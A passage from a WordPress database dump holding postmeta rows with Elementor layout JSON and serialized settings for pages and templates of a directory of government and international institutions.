More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26670,3897,'_elementor_pro_version','3.3.6'),(26673,3898,'_elementor_edit_mode','builder'),(26674,3898,'_elementor_template_type','wp-page'),(26675,3898,'_elementor_version','3.4.0'),(26676,3898,'_wp_page_template','default'),(26677,3898,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26679,3898,'_elementor_pro_version','3.3.6'),(26681,3899,'_elementor_edit_mode','builder'),(26682,3899,'_elementor_template_type','wp-page'),(26683,3899,'_elementor_version','3.4.0'),(26684,3899,'_wp_page_template','default'),(26685,3899,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26687,3899,'_elementor_pro_version','3.3.6'),(26689,3900,'_elementor_edit_mode','builder'),(26690,3900,'_elementor_template_type','wp-page'),(26691,3900,'_elementor_version','3.4.0'),(26692,3900,'_wp_page_template','default'),(26693,3900,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions - Government, National and International\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"488c72e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"53394e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"35b6f4d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_skin_template\":\"3877\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"b2d7711\"}],\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_posts_per_page\":15,\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"institution\",\"posts_order\":\"asc\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"pagination_type\":\"numbers_and_prev_next\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"fb437a8\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\"}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(26695,3900,'_elementor_pro_version','3.3.6'),(26697,89,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:5:\"posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:3:{s:14:\"section_layout\";a:7:{s:5:\"_skin\";i:1;s:20:\"custom_skin_template\";i:1;s:20:\"custom_template_list\";i:1;s:18:\"custom_same_height\";i:1;s:14:\"custom_link_to\";i:1;s:21:\"custom_posts_per_page\";i:1;s:15:\"custom_postlink\";i:1;}s:13:\"section_query\";a:2:{s:15:\"posts_post_type\";i:1;s:11:\"posts_order\";i:1;}s:18:\"section_pagination\";a:1:{s:15:\"pagination_type\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(26701,3901,'_elementor_edit_mode','builder'),(26702,3901,'_elementor_template_type','single-post'),(26703,3901,'_elementor_version','3.4.3'),(26704,3901,'_elementor_pro_version','3.3.6'),(26705,3901,'_edit_lock','1646910510:42'),(26706,3902,'_elementor_edit_mode','builder'),(26707,3902,'_elementor_template_type','single-post'),(26708,3902,'_elementor_version','3.4.0'),(26709,3902,'_elementor_pro_version','3.3.6'),(26710,3901,'_wp_page_template','default'),(26711,3901,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c755a3b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"482e8d8\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"custom_text\":\"Go to Institution\'s Website\",\"custom_url\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"show_icon\":\"none\",\"__dynamic__\":{\"custom_url\":\"[elementor-tag id=\\\"3980bf4\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}}],\"text_color\":\"#008000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(26712,3903,'_elementor_edit_mode','builder'),(26713,3903,'_elementor_template_type','single-post'),(26714,3903,'_elementor_version','3.4.0'),(26715,3903,'_elementor_pro_version','3.3.6'),(26716,3903,'_wp_page_template','default'),(26717,3903,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.281},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.664},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26720,3901,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26731,3901,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26732,3905,'_elementor_edit_mode','builder'),(26733,3905,'_elementor_template_type','single-post'),(26734,3905,'_elementor_version','3.4.0'),(26735,3905,'_elementor_pro_version','3.3.6'),(26736,3905,'_wp_page_template','default'),(26737,3905,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.281},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.664},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26739,3905,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26740,3905,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26742,1582,'_last_editor_used_jetpack','classic-editor'),(26743,1582,'internet','https://epa.gov.lr/'),(26744,1582,'_pods_institution_logo','a:1:{i:0;i:2109;}'),(26746,3906,'_elementor_edit_mode','builder'),(26747,3906,'_elementor_template_type','single-post'),(26748,3906,'_elementor_version','3.4.0'),(26749,3906,'_elementor_pro_version','3.3.6'),(26750,3906,'_wp_page_template','default'),(26751,3906,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.281},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.664},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26753,3906,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26754,3906,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26756,3907,'_elementor_edit_mode','builder'),(26757,3907,'_elementor_template_type','single-post'),(26758,3907,'_elementor_version','3.4.0'),(26759,3907,'_elementor_pro_version','3.3.6'),(26760,3907,'_wp_page_template','default'),(26761,3907,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":78.09},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":21.855},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag 